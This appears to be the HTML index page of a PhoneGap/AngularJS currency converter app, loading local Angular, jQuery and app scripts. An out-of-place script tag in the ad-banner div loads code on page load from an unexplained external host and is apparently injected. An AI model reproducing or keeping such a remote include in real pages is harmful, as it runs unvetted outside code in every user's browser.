<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Currency Convertor</title>
  <link rel="stylesheet" href="css/bootstrap.css">
  <link rel="stylesheet" href="css/app.css"/>
</head>
<body onload="initialize();" onunload="goingAway();">
  <div id="topAdBanner">
    <SCRIPT type="text/javascript" LANGUAGE="javascript" src="http://www.qksz.net/1e-lf0v"> </SCRIPT>
  <div>
  <header>
    <h1>Currency Converter</h1>
  </header>
  <div ng-view class="content"></div>
  <footer>
    &copy; Copyright 2013 - <a href="http://www.angelsdice.com" target="_blank">Angels Dice ltd</a>

  </footer>
  <!-- In production use:
  <script src="//ajax.googleapis.com/ajax/libs/angularjs/1.0.2/angular.min.js"></script>
  -->
  <script src="lib/jquery.min.js"></script>
  <script src="lib/angular/angular.js"></script>
  <script src="lib/angular/angular-resource.js"></script>
  <script src="lib/angular/angular-sanitize.js"></script>
  <script src="js/bootstrap.min.js"></script>
  <script src="phonegap.js"></script>
  <script src="GAPlugin.js"></script>
  <script src="js/app.js"></script>
  <script src="js/services.js"></script>
  <script src="js/controllers.js"></script>
  <script src="js/filters.js"></script>
  <script src="js/directives.js"></script>
</body>
</html>
